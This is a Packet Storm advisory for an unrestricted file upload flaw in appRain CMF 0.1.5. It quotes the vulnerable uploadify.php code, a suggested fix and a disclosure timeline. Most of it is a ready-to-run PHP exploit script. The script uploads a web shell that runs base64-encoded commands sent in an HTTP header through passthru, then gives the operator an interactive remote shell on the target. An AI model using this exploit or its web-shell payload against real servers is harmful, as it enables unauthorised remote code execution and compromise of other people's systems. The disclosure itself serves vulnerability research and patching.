appRain CMF 0.1.5 Shell Upload

2012-01-19T00:00:00
ID PACKETSTORM:108832
Type packetstorm
Reporter EgiX
Modified 2012-01-19T00:00:00

Description

                                        
                                            `<?php  
  
/*  
---------------------------------------------------------------------  
appRain CMF <= 0.1.5 (uploadify.php) Unrestricted File Upload Exploit  
---------------------------------------------------------------------  
  
author............: Egidio Romano aka EgiX  
mail..............: n0b0d13s[at]gmail[dot]com  
software link.....: http://www.apprain.com/  
  
+-------------------------------------------------------------------------+  
| This proof of concept code was written for educational purpose only. |  
| Use it at your own risk. Author will be not responsible for any damage. |  
+-------------------------------------------------------------------------+  
  
[-] vulnerable code in /webroot/addons/uploadify/uploadify.php  
  
27. if (!empty($_FILES)) {  
28. $tempFile = $_FILES['Filedata']['tmp_name'];  
29. //$targetPath = $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['folder'] . '/';  
30. $targetFile = "uploads/" . $_FILES['Filedata']['name'];  
31.   
32. // $fileTypes = str_replace('*.','',$_REQUEST['fileext']);  
33. // $fileTypes = str_replace(';','|',$fileTypes);  
34. // $typesArray = split('\|',$fileTypes);  
35. // $fileParts = pathinfo($_FILES['Filedata']['name']);  
36.   
37. // if (in_array($fileParts['extension'],$typesArray)) {  
38. // Uncomment the following line if you want to make the directory if it doesn't exist  
39. // mkdir(str_replace('//','/',$targetPath), 0755, true);  
40.   
41. move_uploaded_file($tempFile,$targetFile);  
42. echo str_replace($_SERVER['DOCUMENT_ROOT'],'',$targetFile);  
43. // } else {  
44. // echo 'Invalid file type.';  
45. // }  
46. }  
  
Restricted access to this script isn't properly realized, so an attacker might be able to upload  
arbitrary files containing malicious PHP code due to uploaded file extension isn't properly checked.  
  
[-] Possible bug fix:  
  
include_once('../../../app.php');  
App::__Obj('appRain_Base_Core')->check_admin_login();  
  
add this lines of code at the beginning of the script  
  
[-] Disclosure timeline:  
  
[19/12/2011] - Vulnerability discovered  
[19/12/2011] - Issue reported to http://www.apprain.com/ticket/1135  
[20/12/2011] - Vendor response and fix suggested  
[16/01/2012] - After four weeks still no fix released  
[19/01/2012] - Public disclosure  
  
*/  
  
error_reporting(0);  
set_time_limit(0);  
ini_set("default_socket_timeout", 5);  
  
function http_send($host, $packet)  
{  
if (!($sock = fsockopen($host, 80)))  
die("\n[-] No response from {$host}:80\n");  
  
fputs($sock, $packet);  
return stream_get_contents($sock);  
}  
  
print "\n+---------------------------------------------------------------+";  
print "\n| appRain CMF <= 0.1.5 Unrestricted File Upload Exploit by EgiX |";  
print "\n+---------------------------------------------------------------+\n";  
  
if ($argc < 3)  
{  
print "\nUsage......: php $argv[0] <host> <path>\n";  
print "\nExample....: php $argv[0] localhost /";  
print "\nExample....: php $argv[0] localhost /apprain-v015/\n";  
die();  
}  
  
$host = $argv[1];  
$path = $argv[2];  
  
$payload = "--o0oOo0o\r\n";  
$payload .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"sh.php\"\r\n\r\n";  
$payload .= "<?php error_reporting(0); print(___); passthru(base64_decode(\$_SERVER[HTTP_CMD]));\r\n";  
$payload .= "--o0oOo0o--\r\n";  
  
$packet = "POST {$path}addons/uploadify/uploadify.php HTTP/1.0\r\n";  
$packet .= "Host: {$host}\r\n";  
$packet .= "Content-Length: ".strlen($payload)."\r\n";  
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";  
$packet .= "Connection: close\r\n\r\n{$payload}";  
  
if (!preg_match('/sh.php/', http_send($host, $packet))) die("\n[-] Upload failed!\n");  
  
$packet = "GET {$path}addons/uploadify/uploads/sh.php HTTP/1.0\r\n";  
$packet .= "Host: {$host}\r\n";  
$packet .= "Cmd: %s\r\n";  
$packet .= "Connection: close\r\n\r\n";  
  
while(1)  
{  
print "\napprain-shell# ";  
if (($cmd = trim(fgets(STDIN))) == "exit") break;  
$response = http_send($host, sprintf($packet, base64_encode($cmd)));  
preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");  
}  
  
?>  
  
`